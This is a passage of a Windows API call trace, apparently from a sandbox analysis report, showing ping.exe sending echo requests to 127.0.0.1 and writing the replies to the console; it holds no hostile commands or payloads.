lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0138.540] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x5e7b00 [0138.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x5e7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _write (in: _FileHandle=1, _Buf=0x5e7b00*, _MaxCharCount=0x14 | out: _Buf=0x5e7b00*) returned 20 [0138.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.540] LocalFree (hMem=0x5e7b00) returned 0x0 [0138.540] LocalFree (hMem=0x5e7ac8) returned 0x0 [0138.540] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="竈^ﰤ3▪\x94䰨盪❚") returned 0x18 [0138.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.540] GetFileType (hFile=0x28) returned 0x2 [0138.540] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0138.540] GetLastError () returned 0x6 [0138.540] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3❚") returned 0x0 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0138.540] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5dc390 [0138.540] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x5dc390, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _write (in: _FileHandle=1, _Buf=0x5dc390*, _MaxCharCount=0x18 | out: _Buf=0x5dc390*) returned 24 [0138.540] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.540] _fileno (_File=0x76ea4c28) returned 1 [0138.540] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.540] LocalFree (hMem=0x5dc390) returned 0x0 [0138.540] LocalFree (hMem=0x5e7ac8) returned 0x0 [0138.540] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0138.540] IcmpSendEcho2Ex (in: IcmpHandle=0x5d6d40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x5dc250, RequestSize=0x20, RequestOptions=0x33f2cc, ReplyBuffer=0x5e5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x5e5270) returned 0x1 [0138.541] InetNtopW (in: Family=2, pAddr=0x33f2bc, pStringBuf=0x33f3e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0138.541] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="笈^ﰤ3⛔\x94䰨盪✣") returned 0x16 [0138.541] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.541] _fileno (_File=0x76ea4c28) returned 1 [0138.541] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.541] GetFileType (hFile=0x28) returned 0x2 [0138.541] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0138.542] GetLastError () returned 0x6 [0138.542] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✣") returned 0x0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0138.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0138.542] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x5e7b40 [0138.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x5e7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _write (in: _FileHandle=1, _Buf=0x5e7b40*, _MaxCharCount=0x16 | out: _Buf=0x5e7b40*) returned 22 [0138.542] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0138.542] LocalFree (hMem=0x5e7b40) returned 0x0 [0138.542] LocalFree (hMem=0x5e7b08) returned 0x0 [0138.542] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="笈^ﰤ3⛿\x94䰨盪✼") returned 0x9 [0138.542] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.542] GetFileType (hFile=0x28) returned 0x2 [0138.542] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0138.542] GetLastError () returned 0x6 [0138.542] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✼") returned 0x0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0138.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.542] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8a90 [0138.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x5d8a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _write (in: _FileHandle=1, _Buf=0x5d8a90*, _MaxCharCount=0x9 | out: _Buf=0x5d8a90*) returned 9 [0138.542] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0138.542] LocalFree (hMem=0x5d8a90) returned 0x0 [0138.542] LocalFree (hMem=0x5e7b08) returned 0x0 [0138.542] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x33f254, nSize=0x0, Arguments=0x33f250 | out: lpBuffer="笈^ﰤ3➷\x94䰨盪✧") returned 0x9 [0138.542] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.542] GetFileType (hFile=0x28) returned 0x2 [0138.542] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f218 | out: lpMode=0x33f218) returned 0 [0138.542] GetLastError () returned 0x6 [0138.542] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f17c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0138.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.542] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8a90 [0138.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x5d8a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.542] _write (in: _FileHandle=1, _Buf=0x5d8a90*, _MaxCharCount=0x9 | out: _Buf=0x5d8a90*) returned 9 [0138.542] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.542] _fileno (_File=0x76ea4c28) returned 1 [0138.543] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0138.543] LocalFree (hMem=0x5d8a90) returned 0x0 [0138.543] LocalFree (hMem=0x5e7b08) returned 0x0 [0138.543] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="笈^ﰤ3⟘\x94䰨盪✨") returned 0x9 [0138.543] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.543] _fileno (_File=0x76ea4c28) returned 1 [0138.543] _get_osfhandle (_FileHandle=1) returned 0x28 [0138.543] GetFileType (hFile=0x28) returned 0x2 [0138.543] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0138.543] GetLastError () returned 0x6 [0138.543] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✨") returned 0x0 [0138.543] _fileno (_File=0x76ea4c28) returned 1 [0138.543] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0138.543] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.543] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8910 [0138.543] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x5d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0138.543] _fileno (_File=0x76ea4c28) returned 1 [0138.543] _write (in: _FileHandle=1, _Buf=0x5d8910*, _MaxCharCount=0x9 | out: _Buf=0x5d8910*) returned 9 [0138.543] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0138.543] _fileno (_File=0x76ea4c28) returned 1 [0138.543] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0138.543] LocalFree (hMem=0x5d8910) returned 0x0 [0138.543] LocalFree (hMem=0x5e7b08) returned 0x0 [0138.543] Sleep (dwMilliseconds=0x3e8) [0139.552] IcmpSendEcho2Ex (in: IcmpHandle=0x5d6d40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x5dc250, RequestSize=0x20, RequestOptions=0x33f2cc, ReplyBuffer=0x5e5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x5e5270) returned 0x1 [0139.552] InetNtopW (in: Family=2, pAddr=0x33f2bc, pStringBuf=0x33f3e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0139.552] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="羠^ﰤ3⛔\x94䰨盪✣") returned 0x16 [0139.552] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.552] _fileno (_File=0x76ea4c28) returned 1 [0139.552] _get_osfhandle (_FileHandle=1) returned 0x28 [0139.552] GetFileType (hFile=0x28) returned 0x2 [0139.552] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0139.553] GetLastError () returned 0x6 [0139.553] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✣") returned 0x0 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0139.553] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0139.553] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x5e7fd8 [0139.553] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x5e7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _write (in: _FileHandle=1, _Buf=0x5e7fd8*, _MaxCharCount=0x16 | out: _Buf=0x5e7fd8*) returned 22 [0139.553] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0139.553] LocalFree (hMem=0x5e7fd8) returned 0x0 [0139.553] LocalFree (hMem=0x5e7fa0) returned 0x0 [0139.553] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="羠^ﰤ3⛿\x94䰨盪✼") returned 0x9 [0139.553] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _get_osfhandle (_FileHandle=1) returned 0x28 [0139.553] GetFileType (hFile=0x28) returned 0x2 [0139.553] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0139.553] GetLastError () returned 0x6 [0139.553] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✼") returned 0x0 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0139.553] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.553] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8910 [0139.553] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x5d8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _write (in: _FileHandle=1, _Buf=0x5d8910*, _MaxCharCount=0x9 | out: _Buf=0x5d8910*) returned 9 [0139.553] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0139.553] LocalFree (hMem=0x5d8910) returned 0x0 [0139.553] LocalFree (hMem=0x5e7fa0) returned 0x0 [0139.553] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x33f254, nSize=0x0, Arguments=0x33f250 | out: lpBuffer="羠^ﰤ3➷\x94䰨盪✧") returned 0x9 [0139.553] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.553] _fileno (_File=0x76ea4c28) returned 1 [0139.553] _get_osfhandle (_FileHandle=1) returned 0x28 [0139.554] GetFileType (hFile=0x28) returned 0x2 [0139.554] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f218 | out: lpMode=0x33f218) returned 0 [0139.554] GetLastError () returned 0x6 [0139.554] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f17c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0139.554] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.554] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8a90 [0139.554] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x5d8a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _write (in: _FileHandle=1, _Buf=0x5d8a90*, _MaxCharCount=0x9 | out: _Buf=0x5d8a90*) returned 9 [0139.554] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0139.554] LocalFree (hMem=0x5d8a90) returned 0x0 [0139.554] LocalFree (hMem=0x5e7fa0) returned 0x0 [0139.554] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="羠^ﰤ3⟘\x94䰨盪✨") returned 0x9 [0139.554] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _get_osfhandle (_FileHandle=1) returned 0x28 [0139.554] GetFileType (hFile=0x28) returned 0x2 [0139.554] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0139.554] GetLastError () returned 0x6 [0139.554] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✨") returned 0x0 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0139.554] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.554] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8a90 [0139.554] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x5d8a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _write (in: _FileHandle=1, _Buf=0x5d8a90*, _MaxCharCount=0x9 | out: _Buf=0x5d8a90*) returned 9 [0139.554] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0139.554] _fileno (_File=0x76ea4c28) returned 1 [0139.554] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0139.554] LocalFree (hMem=0x5d8a90) returned 0x0 [0139.554] LocalFree (hMem=0x5e7fa0) returned 0x0 [0139.554] Sleep (dwMilliseconds=0x3e8) [0140.560] IcmpSendEcho2Ex (in: IcmpHandle=0x5d6d40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x5dc250, RequestSize=0x20, RequestOptions=0x33f2cc, ReplyBuffer=0x5e5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x5e5270) returned 0x1 [0140.561] InetNtopW (in: Family=2, pAddr=0x33f2bc, pStringBuf=0x33f3e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0140.561] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="羠^ﰤ3⛔\x94䰨盪✣") returned 0x16 [0140.561] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.561] _fileno (_File=0x76ea4c28) returned 1 [0140.561] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.561] GetFileType (hFile=0x28) returned 0x2 [0140.561] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0140.561] GetLastError () returned 0x6 [0140.561] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✣") returned 0x0 [0140.561] _fileno (_File=0x76ea4c28) returned 1 [0140.561] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0140.561] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0140.561] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x5e7fd8 [0140.561] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x5e7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0140.561] _fileno (_File=0x76ea4c28) returned 1 [0140.561] _write (in: _FileHandle=1, _Buf=0x5e7fd8*, _MaxCharCount=0x16 | out: _Buf=0x5e7fd8*) returned 22 [0140.562] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0140.562] LocalFree (hMem=0x5e7fd8) returned 0x0 [0140.562] LocalFree (hMem=0x5e7fa0) returned 0x0 [0140.562] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="羠^ﰤ3⛿\x94䰨盪✼") returned 0x9 [0140.562] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.562] GetFileType (hFile=0x28) returned 0x2 [0140.562] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f214 | out: lpMode=0x33f214) returned 0 [0140.562] GetLastError () returned 0x6 [0140.562] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f178, nSize=0x50 | out: lpBuffer="3✼") returned 0x0 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0140.562] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.562] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8940 [0140.562] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x5d8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _write (in: _FileHandle=1, _Buf=0x5d8940*, _MaxCharCount=0x9 | out: _Buf=0x5d8940*) returned 9 [0140.562] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0140.562] LocalFree (hMem=0x5d8940) returned 0x0 [0140.562] LocalFree (hMem=0x5e7fa0) returned 0x0 [0140.562] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x33f254, nSize=0x0, Arguments=0x33f250 | out: lpBuffer="羠^ﰤ3➷\x94䰨盪✧") returned 0x9 [0140.562] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _get_osfhandle (_FileHandle=1) returned 0x28 [0140.562] GetFileType (hFile=0x28) returned 0x2 [0140.562] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x33f218 | out: lpMode=0x33f218) returned 0 [0140.562] GetLastError () returned 0x6 [0140.562] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x33f17c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.562] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0140.562] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.562] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5d8940 [0140.562] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x5d8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0140.562] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _write (in: _FileHandle=1, _Buf=0x5d8940*, _MaxCharCount=0x9 | out: _Buf=0x5d8940*) returned 9 [0140.563] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0140.563] _fileno (_File=0x76ea4c28) returned 1 [0140.563] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0140.563] LocalFree (hMem=0x5d8940) returned 0x0 [0140.563] LocalFree (hMem=0x5e7fa0) returned 0x0 [0140.563] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x33f250, nSize=0x0, Arguments=0x33f24c | out: lpBuffer="羠^ﰤ3⟘\x94䰨盪✨") returned 0x9 [0140.563] fflush (in: _File=0x76ea4c28 | out: 